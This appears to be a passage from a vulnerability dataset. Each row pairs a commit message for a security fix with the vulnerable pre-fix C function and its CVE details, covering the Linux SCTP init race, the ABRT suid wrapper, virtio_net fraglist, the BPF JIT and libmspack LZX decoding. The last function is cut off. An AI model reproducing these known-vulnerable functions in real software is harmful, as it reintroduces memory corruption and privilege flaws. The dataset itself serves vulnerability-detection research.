] | CVE-2015-5287 | The abrt-hook-ccpp help program in Automatic Bug Reporting Tool (ABRT) before 2.7.1 allows local users with certain permissions to gain privileges via a symlink attack on a file with a predictable name, as demonstrated by /var/tmp/abrt/abrt-hax-coredump or /var/spool/abrt/abrt-hax-coredump. | https://nvd.nist.gov/vuln/detail/CVE-2015-5287 |
1,463 | linux | 8e2d61e0aed2b7c4ecb35844fe07e0b2b762dee4 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8e2d61e0aed2b7c4ecb35844fe07e0b2b762dee4 | sctp: fix race on protocol/netns initialization
Consider sctp module is unloaded and is being requested because an user
is creating a sctp socket.
During initialization, sctp will add the new protocol type and then
initialize pernet subsys:
status = sctp_v4_protosw_init();
if (status)
goto err_protosw_init;
status = sctp_v6_protosw_init();
if (status)
goto err_v6_protosw_init;
status = register_pernet_subsys(&sctp_net_ops);
The problem is that after those calls to sctp_v{4,6}_protosw_init(), it
is possible for userspace to create SCTP sockets like if the module is
already fully loaded. If that happens, one of the possible effects is
that we will have readers for net->sctp.local_addr_list list earlier
than expected and sctp_net_init() does not take precautions while
dealing with that list, leading to a potential panic but not limited to
that, as sctp_sock_init() will copy a bunch of blank/partially
initialized values from net->sctp.
The race happens like this:
CPU 0 | CPU 1
socket() |
__sock_create | socket()
inet_create | __sock_create
list_for_each_entry_rcu( |
answer, &inetsw[sock->type], |
list) { | inet_create
/* no hits */ |
if (unlikely(err)) { |
... |
request_module() |
/* socket creation is blocked |
* the module is fully loaded |
*/ |
sctp_init |
sctp_v4_protosw_init |
inet_register_protosw |
list_add_rcu(&p->list, |
last_perm); |
| list_for_each_entry_rcu(
| answer, &inetsw[sock->type],
sctp_v6_protosw_init | list) {
| /* hit, so assumes protocol
| * is already loaded
| */
| /* socket creation continues
| * before netns is initialized
| */
register_pernet_subsys |
Simply inverting the initialization order between
register_pernet_subsys() and sctp_v4_protosw_init() is not possible
because register_pernet_subsys() will create a control sctp socket, so
the protocol must be already visible by then. Deferring the socket
creation to a work-queue is not good specially because we loose the
ability to handle its errors.
So, as suggested by Vlad, the fix is to split netns initialization in
two moments: defaults and control socket, so that the defaults are
already loaded by when we register the protocol, while control socket
initialization is kept at the same moment it is today.
Fixes: 4db67e808640 ("sctp: Make the address lists per network namespace")
Signed-off-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static __init int sctp_init(void)
{
int i;
int status = -EINVAL;
unsigned long goal;
unsigned long limit;
int max_share;
int order;
sock_skb_cb_check_size(sizeof(struct sctp_ulpevent));
/* Allocate bind_bucket and chunk caches. */
status = -ENOBUFS;
sctp_bucket_cachep = kmem_cache_create("sctp_bind_bucket",
sizeof(struct sctp_bind_bucket),
0, SLAB_HWCACHE_ALIGN,
NULL);
if (!sctp_bucket_cachep)
goto out;
sctp_chunk_cachep = kmem_cache_create("sctp_chunk",
sizeof(struct sctp_chunk),
0, SLAB_HWCACHE_ALIGN,
NULL);
if (!sctp_chunk_cachep)
goto err_chunk_cachep;
status = percpu_counter_init(&sctp_sockets_allocated, 0, GFP_KERNEL);
if (status)
goto err_percpu_counter_init;
/* Implementation specific variables. */
/* Initialize default stream count setup information. */
sctp_max_instreams = SCTP_DEFAULT_INSTREAMS;
sctp_max_outstreams = SCTP_DEFAULT_OUTSTREAMS;
/* Initialize handle used for association ids. */
idr_init(&sctp_assocs_id);
limit = nr_free_buffer_pages() / 8;
limit = max(limit, 128UL);
sysctl_sctp_mem[0] = limit / 4 * 3;
sysctl_sctp_mem[1] = limit;
sysctl_sctp_mem[2] = sysctl_sctp_mem[0] * 2;
/* Set per-socket limits to no more than 1/128 the pressure threshold*/
limit = (sysctl_sctp_mem[1]) << (PAGE_SHIFT - 7);
max_share = min(4UL*1024*1024, limit);
sysctl_sctp_rmem[0] = SK_MEM_QUANTUM; /* give each asoc 1 page min */
sysctl_sctp_rmem[1] = 1500 * SKB_TRUESIZE(1);
sysctl_sctp_rmem[2] = max(sysctl_sctp_rmem[1], max_share);
sysctl_sctp_wmem[0] = SK_MEM_QUANTUM;
sysctl_sctp_wmem[1] = 16*1024;
sysctl_sctp_wmem[2] = max(64*1024, max_share);
/* Size and allocate the association hash table.
* The methodology is similar to that of the tcp hash tables.
*/
if (totalram_pages >= (128 * 1024))
goal = totalram_pages >> (22 - PAGE_SHIFT);
else
goal = totalram_pages >> (24 - PAGE_SHIFT);
for (order = 0; (1UL << order) < goal; order++)
;
do {
sctp_assoc_hashsize = (1UL << order) * PAGE_SIZE /
sizeof(struct sctp_hashbucket);
if ((sctp_assoc_hashsize > (64 * 1024)) && order > 0)
continue;
sctp_assoc_hashtable = (struct sctp_hashbucket *)
__get_free_pages(GFP_ATOMIC|__GFP_NOWARN, order);
} while (!sctp_assoc_hashtable && --order > 0);
if (!sctp_assoc_hashtable) {
pr_err("Failed association hash alloc\n");
status = -ENOMEM;
goto err_ahash_alloc;
}
for (i = 0; i < sctp_assoc_hashsize; i++) {
rwlock_init(&sctp_assoc_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_assoc_hashtable[i].chain);
}
/* Allocate and initialize the endpoint hash table. */
sctp_ep_hashsize = 64;
sctp_ep_hashtable =
kmalloc(64 * sizeof(struct sctp_hashbucket), GFP_KERNEL);
if (!sctp_ep_hashtable) {
pr_err("Failed endpoint_hash alloc\n");
status = -ENOMEM;
goto err_ehash_alloc;
}
for (i = 0; i < sctp_ep_hashsize; i++) {
rwlock_init(&sctp_ep_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_ep_hashtable[i].chain);
}
/* Allocate and initialize the SCTP port hash table. */
do {
sctp_port_hashsize = (1UL << order) * PAGE_SIZE /
sizeof(struct sctp_bind_hashbucket);
if ((sctp_port_hashsize > (64 * 1024)) && order > 0)
continue;
sctp_port_hashtable = (struct sctp_bind_hashbucket *)
__get_free_pages(GFP_ATOMIC|__GFP_NOWARN, order);
} while (!sctp_port_hashtable && --order > 0);
if (!sctp_port_hashtable) {
pr_err("Failed bind hash alloc\n");
status = -ENOMEM;
goto err_bhash_alloc;
}
for (i = 0; i < sctp_port_hashsize; i++) {
spin_lock_init(&sctp_port_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_port_hashtable[i].chain);
}
pr_info("Hash tables configured (established %d bind %d)\n",
sctp_assoc_hashsize, sctp_port_hashsize);
sctp_sysctl_register();
INIT_LIST_HEAD(&sctp_address_families);
sctp_v4_pf_init();
sctp_v6_pf_init();
status = sctp_v4_protosw_init();
if (status)
goto err_protosw_init;
status = sctp_v6_protosw_init();
if (status)
goto err_v6_protosw_init;
status = register_pernet_subsys(&sctp_net_ops);
if (status)
goto err_register_pernet_subsys;
status = sctp_v4_add_protocol();
if (status)
goto err_add_protocol;
/* Register SCTP with inet6 layer. */
status = sctp_v6_add_protocol();
if (status)
goto err_v6_add_protocol;
out:
return status;
err_v6_add_protocol:
sctp_v4_del_protocol();
err_add_protocol:
unregister_pernet_subsys(&sctp_net_ops);
err_register_pernet_subsys:
sctp_v6_protosw_exit();
err_v6_protosw_init:
sctp_v4_protosw_exit();
err_protosw_init:
sctp_v4_pf_exit();
sctp_v6_pf_exit();
sctp_sysctl_unregister();
free_pages((unsigned long)sctp_port_hashtable,
get_order(sctp_port_hashsize *
sizeof(struct sctp_bind_hashbucket)));
err_bhash_alloc:
kfree(sctp_ep_hashtable);
err_ehash_alloc:
free_pages((unsigned long)sctp_assoc_hashtable,
get_order(sctp_assoc_hashsize *
sizeof(struct sctp_hashbucket)));
err_ahash_alloc:
percpu_counter_destroy(&sctp_sockets_allocated);
err_percpu_counter_init:
kmem_cache_destroy(sctp_chunk_cachep);
err_chunk_cachep:
kmem_cache_destroy(sctp_bucket_cachep);
goto out;
}
| 167,189,804,297,399,060,000,000,000,000,000,000,000 | protocol.c | 19,924,814,074,907,472,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-5283 | The sctp_init function in net/sctp/protocol.c in the Linux kernel before 4.2.3 has an incorrect sequence of protocol-initialization steps, which allows local users to cause a denial of service (panic or memory corruption) by creating SCTP sockets before all of the steps have finished. | https://nvd.nist.gov/vuln/detail/CVE-2015-5283 |
1,466 | abrt | 50ee8130fb4cd4ef1af7682a2c85dd99cb99424e | https://github.com/abrt/abrt | https://github.com/abrt/abrt/commit/50ee8130fb4cd4ef1af7682a2c85dd99cb99424e | a-a-i-d-to-abrt-cache: make own random temporary directory
The set-user-ID wrapper must use own new temporary directory in order to
avoid security issues with unpacking specially crafted debuginfo
packages that might be used to create files or symlinks anywhere on the
file system as the abrt user.
Withot the forking code the temporary directory would remain on the
filesystem in the case where all debuginfo data are already available.
This is caused by the fact that the underlying libreport functionality
accepts path to a desired temporary directory and creates it only if
necessary. Otherwise, the directory is not touched at all.
This commit addresses CVE-2015-5273
Signed-off-by: Jakub Filak <jfilak@redhat.com> | 1 | int main(int argc, char **argv)
{
/* I18n */
setlocale(LC_ALL, "");
#if ENABLE_NLS
bindtextdomain(PACKAGE, LOCALEDIR);
textdomain(PACKAGE);
#endif
abrt_init(argv);
/* Can't keep these strings/structs static: _() doesn't support that */
const char *program_usage_string = _(
"& [-y] [-i BUILD_IDS_FILE|-i -] [-e PATH[:PATH]...]\n"
"\t[-r REPO]\n"
"\n"
"Installs debuginfo packages for all build-ids listed in BUILD_IDS_FILE to\n"
"ABRT system cache."
);
enum {
OPT_v = 1 << 0,
OPT_y = 1 << 1,
OPT_i = 1 << 2,
OPT_e = 1 << 3,
OPT_r = 1 << 4,
OPT_s = 1 << 5,
};
const char *build_ids = "build_ids";
const char *exact = NULL;
const char *repo = NULL;
const char *size_mb = NULL;
struct options program_options[] = {
OPT__VERBOSE(&g_verbose),
OPT_BOOL ('y', "yes", NULL, _("Noninteractive, assume 'Yes' to all questions")),
OPT_STRING('i', "ids", &build_ids, "BUILD_IDS_FILE", _("- means STDIN, default: build_ids")),
OPT_STRING('e', "exact", &exact, "EXACT", _("Download only specified files")),
OPT_STRING('r', "repo", &repo, "REPO", _("Pattern to use when searching for repos, default: *debug*")),
OPT_STRING('s', "size_mb", &size_mb, "SIZE_MB", _("Ignored option")),
OPT_END()
};
const unsigned opts = parse_opts(argc, argv, program_options, program_usage_string);
const gid_t egid = getegid();
const gid_t rgid = getgid();
const uid_t euid = geteuid();
const gid_t ruid = getuid();
/* We need to open the build ids file under the caller's UID/GID to avoid
* information disclosures when reading files with changed UID.
* Unfortunately, we cannot replace STDIN with the new fd because ABRT uses
* STDIN to communicate with the caller. So, the following code opens a
* dummy file descriptor to the build ids file and passes the new fd's proc
* path to the wrapped program in the ids argument.
* The new fd remains opened, the OS will close it for us. */
char *build_ids_self_fd = NULL;
if (strcmp("-", build_ids) != 0)
{
if (setregid(egid, rgid) < 0)
perror_msg_and_die("setregid(egid, rgid)");
if (setreuid(euid, ruid) < 0)
perror_msg_and_die("setreuid(euid, ruid)");
const int build_ids_fd = open(build_ids, O_RDONLY);
if (setregid(rgid, egid) < 0)
perror_msg_and_die("setregid(rgid, egid)");
if (setreuid(ruid, euid) < 0 )
perror_msg_and_die("setreuid(ruid, euid)");
if (build_ids_fd < 0)
perror_msg_and_die("Failed to open file '%s'", build_ids);
/* We are not going to free this memory. There is no place to do so. */
build_ids_self_fd = xasprintf("/proc/self/fd/%d", build_ids_fd);
}
/* name, -v, --ids, -, -y, -e, EXACT, -r, REPO, --, NULL */
const char *args[11];
{
const char *verbs[] = { "", "-v", "-vv", "-vvv" };
unsigned i = 0;
args[i++] = EXECUTABLE;
args[i++] = "--ids";
args[i++] = (build_ids_self_fd != NULL) ? build_ids_self_fd : "-";
if (g_verbose > 0)
args[i++] = verbs[g_verbose <= 3 ? g_verbose : 3];
if ((opts & OPT_y))
args[i++] = "-y";
if ((opts & OPT_e))
{
args[i++] = "--exact";
args[i++] = exact;
}
if ((opts & OPT_r))
{
args[i++] = "--repo";
args[i++] = repo;
}
args[i++] = "--";
args[i] = NULL;
}
/* Switch real user/group to effective ones.
* Otherwise yum library gets confused - gets EPERM (why??).
*/
/* do setregid only if we have to, to not upset selinux needlessly */
if (egid != rgid)
IGNORE_RESULT(setregid(egid, egid));
if (euid != ruid)
{
IGNORE_RESULT(setreuid(euid, euid));
/* We are suid'ed! */
/* Prevent malicious user from messing up with suid'ed process: */
#if 1
static const char *whitelist[] = {
"REPORT_CLIENT_SLAVE", // Check if the app is being run as a slave
"LANG",
};
const size_t wlsize = sizeof(whitelist)/sizeof(char*);
char *setlist[sizeof(whitelist)/sizeof(char*)] = { 0 };
char *p = NULL;
for (size_t i = 0; i < wlsize; i++)
if ((p = getenv(whitelist[i])) != NULL)
setlist[i] = xstrdup(p);
clearenv();
for (size_t i = 0; i < wlsize; i++)
if (setlist[i] != NULL)
{
xsetenv(whitelist[i], setlist[i]);
free(setlist[i]);
}
#else
/* Clear dangerous stuff from env */
static const char forbid[] =
"LD_LIBRARY_PATH" "\0"
"LD_PRELOAD" "\0"
"LD_TRACE_LOADED_OBJECTS" "\0"
"LD_BIND_NOW" "\0"
"LD_AOUT_LIBRARY_PATH" "\0"
"LD_AOUT_PRELOAD" "\0"
"LD_NOWARN" "\0"
"LD_KEEPDIR" "\0"
;
const char *p = forbid;
do {
unsetenv(p);
p += strlen(p) + 1;
} while (*p);
#endif
/* Set safe PATH */
char path_env[] = "PATH=/usr/sbin:/sbin:/usr/bin:/bin:"BIN_DIR":"SBIN_DIR;
if (euid != 0)
strcpy(path_env, "PATH=/usr/bin:/bin:"BIN_DIR);
putenv(path_env);
/* Use safe umask */
umask(0022);
}
execvp(EXECUTABLE, (char **)args);
error_msg_and_die("Can't execute %s", EXECUTABLE);
}
| 92,934,402,516,180,260,000,000,000,000,000,000,000 | None | null | [
"CWE-59"
] | CVE-2015-5273 | The abrt-action-install-debuginfo-to-abrt-cache help program in Automatic Bug Reporting Tool (ABRT) before 2.7.1 allows local users to write to arbitrary files via a symlink attack on unpacked.cpio in a pre-created directory with a predictable name in /var/tmp. | https://nvd.nist.gov/vuln/detail/CVE-2015-5273 |
1,467 | linux | 48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39 | virtio-net: drop NETIF_F_FRAGLIST
virtio declares support for NETIF_F_FRAGLIST, but assumes
that there are at most MAX_SKB_FRAGS + 2 fragments which isn't
always true with a fraglist.
A longer fraglist in the skb will make the call to skb_to_sgvec overflow
the sg array, leading to memory corruption.
Drop NETIF_F_FRAGLIST so we only get what we can handle.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int virtnet_probe(struct virtio_device *vdev)
{
int i, err;
struct net_device *dev;
struct virtnet_info *vi;
u16 max_queue_pairs;
if (!vdev->config->get) {
dev_err(&vdev->dev, "%s failure: config access disabled\n",
__func__);
return -EINVAL;
}
if (!virtnet_validate_features(vdev))
return -EINVAL;
/* Find if host supports multiqueue virtio_net device */
err = virtio_cread_feature(vdev, VIRTIO_NET_F_MQ,
struct virtio_net_config,
max_virtqueue_pairs, &max_queue_pairs);
/* We need at least 2 queue's */
if (err || max_queue_pairs < VIRTIO_NET_CTRL_MQ_VQ_PAIRS_MIN ||
max_queue_pairs > VIRTIO_NET_CTRL_MQ_VQ_PAIRS_MAX ||
!virtio_has_feature(vdev, VIRTIO_NET_F_CTRL_VQ))
max_queue_pairs = 1;
/* Allocate ourselves a network device with room for our info */
dev = alloc_etherdev_mq(sizeof(struct virtnet_info), max_queue_pairs);
if (!dev)
return -ENOMEM;
/* Set up network device as normal. */
dev->priv_flags |= IFF_UNICAST_FLT | IFF_LIVE_ADDR_CHANGE;
dev->netdev_ops = &virtnet_netdev;
dev->features = NETIF_F_HIGHDMA;
dev->ethtool_ops = &virtnet_ethtool_ops;
SET_NETDEV_DEV(dev, &vdev->dev);
/* Do we support "hardware" checksums? */
if (virtio_has_feature(vdev, VIRTIO_NET_F_CSUM)) {
/* This opens up the world of extra features. */
dev->hw_features |= NETIF_F_HW_CSUM|NETIF_F_SG|NETIF_F_FRAGLIST;
if (csum)
dev->features |= NETIF_F_HW_CSUM|NETIF_F_SG|NETIF_F_FRAGLIST;
if (virtio_has_feature(vdev, VIRTIO_NET_F_GSO)) {
dev->hw_features |= NETIF_F_TSO | NETIF_F_UFO
| NETIF_F_TSO_ECN | NETIF_F_TSO6;
}
/* Individual feature bits: what can host handle? */
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_TSO4))
dev->hw_features |= NETIF_F_TSO;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_TSO6))
dev->hw_features |= NETIF_F_TSO6;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_ECN))
dev->hw_features |= NETIF_F_TSO_ECN;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UFO))
dev->hw_features |= NETIF_F_UFO;
dev->features |= NETIF_F_GSO_ROBUST;
if (gso)
dev->features |= dev->hw_features & (NETIF_F_ALL_TSO|NETIF_F_UFO);
/* (!csum && gso) case will be fixed by register_netdev() */
}
if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_CSUM))
dev->features |= NETIF_F_RXCSUM;
dev->vlan_features = dev->features;
/* Configuration may specify what MAC to use. Otherwise random. */
if (virtio_has_feature(vdev, VIRTIO_NET_F_MAC))
virtio_cread_bytes(vdev,
offsetof(struct virtio_net_config, mac),
dev->dev_addr, dev->addr_len);
else
eth_hw_addr_random(dev);
/* Set up our device-specific information */
vi = netdev_priv(dev);
vi->dev = dev;
vi->vdev = vdev;
vdev->priv = vi;
vi->stats = alloc_percpu(struct virtnet_stats);
err = -ENOMEM;
if (vi->stats == NULL)
goto free;
for_each_possible_cpu(i) {
struct virtnet_stats *virtnet_stats;
virtnet_stats = per_cpu_ptr(vi->stats, i);
u64_stats_init(&virtnet_stats->tx_syncp);
u64_stats_init(&virtnet_stats->rx_syncp);
}
INIT_WORK(&vi->config_work, virtnet_config_changed_work);
/* If we can receive ANY GSO packets, we must allocate large ones. */
if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO4) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO6) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_ECN) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UFO))
vi->big_packets = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_MRG_RXBUF))
vi->mergeable_rx_bufs = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_MRG_RXBUF) ||
virtio_has_feature(vdev, VIRTIO_F_VERSION_1))
vi->hdr_len = sizeof(struct virtio_net_hdr_mrg_rxbuf);
else
vi->hdr_len = sizeof(struct virtio_net_hdr);
if (virtio_has_feature(vdev, VIRTIO_F_ANY_LAYOUT) ||
virtio_has_feature(vdev, VIRTIO_F_VERSION_1))
vi->any_header_sg = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_CTRL_VQ))
vi->has_cvq = true;
if (vi->any_header_sg)
dev->needed_headroom = vi->hdr_len;
/* Use single tx/rx queue pair as default */
vi->curr_queue_pairs = 1;
vi->max_queue_pairs = max_queue_pairs;
/* Allocate/initialize the rx/tx queues, and invoke find_vqs */
err = init_vqs(vi);
if (err)
goto free_stats;
#ifdef CONFIG_SYSFS
if (vi->mergeable_rx_bufs)
dev->sysfs_rx_queue_group = &virtio_net_mrg_rx_group;
#endif
netif_set_real_num_tx_queues(dev, vi->curr_queue_pairs);
netif_set_real_num_rx_queues(dev, vi->curr_queue_pairs);
err = register_netdev(dev);
if (err) {
pr_debug("virtio_net: registering device failed\n");
goto free_vqs;
}
virtio_device_ready(vdev);
/* Last of all, set up some receive buffers. */
for (i = 0; i < vi->curr_queue_pairs; i++) {
try_fill_recv(vi, &vi->rq[i], GFP_KERNEL);
/* If we didn't even get one input buffer, we're useless. */
if (vi->rq[i].vq->num_free ==
virtqueue_get_vring_size(vi->rq[i].vq)) {
free_unused_bufs(vi);
err = -ENOMEM;
goto free_recv_bufs;
}
}
vi->nb.notifier_call = &virtnet_cpu_callback;
err = register_hotcpu_notifier(&vi->nb);
if (err) {
pr_debug("virtio_net: registering cpu notifier failed\n");
goto free_recv_bufs;
}
/* Assume link up if device can't report link status,
otherwise get link status from config. */
if (virtio_has_feature(vi->vdev, VIRTIO_NET_F_STATUS)) {
netif_carrier_off(dev);
schedule_work(&vi->config_work);
} else {
vi->status = VIRTIO_NET_S_LINK_UP;
netif_carrier_on(dev);
}
pr_debug("virtnet: registered device %s with %d RX and TX vq's\n",
dev->name, max_queue_pairs);
return 0;
free_recv_bufs:
vi->vdev->config->reset(vdev);
free_receive_bufs(vi);
unregister_netdev(dev);
free_vqs:
cancel_delayed_work_sync(&vi->refill);
free_receive_page_frags(vi);
virtnet_del_vqs(vi);
free_stats:
free_percpu(vi->stats);
free:
free_netdev(dev);
return err;
}
| 286,743,572,691,752,180,000,000,000,000,000,000,000 | virtio_net.c | 226,259,448,298,505,000,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-5156 | The virtnet_probe function in drivers/net/virtio_net.c in the Linux kernel before 4.2 attempts to support a FRAGLIST feature without proper memory allocation, which allows guest OS users to cause a denial of service (buffer overflow and memory corruption) via a crafted sequence of fragmented packets. | https://nvd.nist.gov/vuln/detail/CVE-2015-5156 |
1,468 | linux | 3f7352bf21f8fd7ba3e2fcef9488756f188e12be | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/3f7352bf21f8fd7ba3e2fcef9488756f188e12be | x86: bpf_jit: fix compilation of large bpf programs
x86 has variable length encoding. x86 JIT compiler is trying
to pick the shortest encoding for given bpf instruction.
While doing so the jump targets are changing, so JIT is doing
multiple passes over the program. Typical program needs 3 passes.
Some very short programs converge with 2 passes. Large programs
may need 4 or 5. But specially crafted bpf programs may hit the
pass limit and if the program converges on the last iteration
the JIT compiler will be producing an image full of 'int 3' insns.
Fix this corner case by doing final iteration over bpf program.
Fixes: 0a14842f5a3c ("net: filter: Just In Time compiler for x86-64")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Alexei Starovoitov <ast@plumgrid.com>
Tested-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
u8 *image = NULL;
int *addrs;
int pass;
int i;
if (!bpf_jit_enable)
return;
if (!prog || !prog->len)
return;
addrs = kmalloc(prog->len * sizeof(*addrs), GFP_KERNEL);
if (!addrs)
return;
/* Before first pass, make a rough estimation of addrs[]
* each bpf instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i < prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
for (pass = 0; pass < 10; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx);
if (proglen <= 0) {
image = NULL;
if (header)
bpf_jit_binary_free(header);
goto out;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out;
}
break;
}
if (proglen == oldproglen) {
header = bpf_jit_binary_alloc(proglen, &image,
1, jit_fill_hole);
if (!header)
goto out;
}
oldproglen = proglen;
}
if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, 0, image);
if (image) {
bpf_flush_icache(header, image + proglen);
set_memory_ro((unsigned long)header, header->pages);
prog->bpf_func = (void *)image;
prog->jited = true;
}
out:
kfree(addrs);
}
| 286,732,731,074,854,750,000,000,000,000,000,000,000 | bpf_jit_comp.c | 247,386,070,920,950,060,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-4700 | The bpf_int_jit_compile function in arch/x86/net/bpf_jit_comp.c in the Linux kernel before 4.0.6 allows local users to cause a denial of service (system crash) by creating a packet filter and then loading crafted BPF instructions that trigger late convergence by the JIT compiler. | https://nvd.nist.gov/vuln/detail/CVE-2015-4700 |
1,469 | libmspack | 18b6a2cc0b87536015bedd4f7763e6b02d5aa4f3 | https://github.com/kyz/libmspack | https://github.com/kyz/libmspack/commit/18b6a2cc0b87536015bedd4f7763e6b02d5aa4f3 | Prevent a 1-byte underread of the input buffer if an odd-sized data block comes just before an uncompressed block header | 1 | int lzxd_decompress(struct lzxd_stream *lzx, off_t out_bytes) {
/* bitstream and huffman reading variables */
register unsigned int bit_buffer;
register int bits_left, i=0;
unsigned char *i_ptr, *i_end;
register unsigned short sym;
int match_length, length_footer, extra, verbatim_bits, bytes_todo;
int this_run, main_element, aligned_bits, j;
unsigned char *window, *runsrc, *rundest, buf[12];
unsigned int frame_size=0, end_frame, match_offset, window_posn;
unsigned int R0, R1, R2;
/* easy answers */
if (!lzx || (out_bytes < 0)) return MSPACK_ERR_ARGS;
if (lzx->error) return lzx->error;
/* flush out any stored-up bytes before we begin */
i = lzx->o_end - lzx->o_ptr;
if ((off_t) i > out_bytes) i = (int) out_bytes;
if (i) {
if (lzx->sys->write(lzx->output, lzx->o_ptr, i) != i) {
return lzx->error = MSPACK_ERR_WRITE;
}
lzx->o_ptr += i;
lzx->offset += i;
out_bytes -= i;
}
if (out_bytes == 0) return MSPACK_ERR_OK;
/* restore local state */
RESTORE_BITS;
window = lzx->window;
window_posn = lzx->window_posn;
R0 = lzx->R0;
R1 = lzx->R1;
R2 = lzx->R2;
end_frame = (unsigned int)((lzx->offset + out_bytes) / LZX_FRAME_SIZE) + 1;
while (lzx->frame < end_frame) {
/* have we reached the reset interval? (if there is one?) */
if (lzx->reset_interval && ((lzx->frame % lzx->reset_interval) == 0)) {
if (lzx->block_remaining) {
D(("%d bytes remaining at reset interval", lzx->block_remaining))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* re-read the intel header and reset the huffman lengths */
lzxd_reset_state(lzx);
R0 = lzx->R0;
R1 = lzx->R1;
R2 = lzx->R2;
}
/* LZX DELTA format has chunk_size, not present in LZX format */
if (lzx->is_delta) {
ENSURE_BITS(16);
REMOVE_BITS(16);
}
/* read header if necessary */
if (!lzx->header_read) {
/* read 1 bit. if bit=0, intel filesize = 0.
* if bit=1, read intel filesize (32 bits) */
j = 0; READ_BITS(i, 1); if (i) { READ_BITS(i, 16); READ_BITS(j, 16); }
lzx->intel_filesize = (i << 16) | j;
lzx->header_read = 1;
}
/* calculate size of frame: all frames are 32k except the final frame
* which is 32kb or less. this can only be calculated when lzx->length
* has been filled in. */
frame_size = LZX_FRAME_SIZE;
if (lzx->length && (lzx->length - lzx->offset) < (off_t)frame_size) {
frame_size = lzx->length - lzx->offset;
}
/* decode until one more frame is available */
bytes_todo = lzx->frame_posn + frame_size - window_posn;
while (bytes_todo > 0) {
/* initialise new block, if one is needed */
if (lzx->block_remaining == 0) {
/* realign if previous block was an odd-sized UNCOMPRESSED block */
if ((lzx->block_type == LZX_BLOCKTYPE_UNCOMPRESSED) &&
(lzx->block_length & 1))
{
READ_IF_NEEDED;
i_ptr++;
}
/* read block type (3 bits) and block length (24 bits) */
READ_BITS(lzx->block_type, 3);
READ_BITS(i, 16); READ_BITS(j, 8);
lzx->block_remaining = lzx->block_length = (i << 8) | j;
/*D(("new block t%d len %u", lzx->block_type, lzx->block_length))*/
/* read individual block headers */
switch (lzx->block_type) {
case LZX_BLOCKTYPE_ALIGNED:
/* read lengths of and build aligned huffman decoding tree */
for (i = 0; i < 8; i++) { READ_BITS(j, 3); lzx->ALIGNED_len[i] = j; }
BUILD_TABLE(ALIGNED);
/* no break -- rest of aligned header is same as verbatim */
case LZX_BLOCKTYPE_VERBATIM:
/* read lengths of and build main huffman decoding tree */
READ_LENGTHS(MAINTREE, 0, 256);
READ_LENGTHS(MAINTREE, 256, LZX_NUM_CHARS + lzx->num_offsets);
BUILD_TABLE(MAINTREE);
/* if the literal 0xE8 is anywhere in the block... */
if (lzx->MAINTREE_len[0xE8] != 0) lzx->intel_started = 1;
/* read lengths of and build lengths huffman decoding tree */
READ_LENGTHS(LENGTH, 0, LZX_NUM_SECONDARY_LENGTHS);
BUILD_TABLE_MAYBE_EMPTY(LENGTH);
break;
case LZX_BLOCKTYPE_UNCOMPRESSED:
/* because we can't assume otherwise */
lzx->intel_started = 1;
/* read 1-16 (not 0-15) bits to align to bytes */
ENSURE_BITS(16);
if (bits_left > 16) i_ptr -= 2;
bits_left = 0; bit_buffer = 0;
/* read 12 bytes of stored R0 / R1 / R2 values */
for (rundest = &buf[0], i = 0; i < 12; i++) {
READ_IF_NEEDED;
*rundest++ = *i_ptr++;
}
R0 = buf[0] | (buf[1] << 8) | (buf[2] << 16) | (buf[3] << 24);
R1 = buf[4] | (buf[5] << 8) | (buf[6] << 16) | (buf[7] << 24);
R2 = buf[8] | (buf[9] << 8) | (buf[10] << 16) | (buf[11] << 24);
break;
default:
D(("bad block type"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
}
/* decode more of the block:
* run = min(what's available, what's needed) */
this_run = lzx->block_remaining;
if (this_run > bytes_todo) this_run = bytes_todo;
/* assume we decode exactly this_run bytes, for now */
bytes_todo -= this_run;
lzx->block_remaining -= this_run;
/* decode at least this_run bytes */
switch (lzx->block_type) {
case LZX_BLOCKTYPE_VERBATIM:
while (this_run > 0) {
READ_HUFFSYM(MAINTREE, main_element);
if (main_element < LZX_NUM_CHARS) {
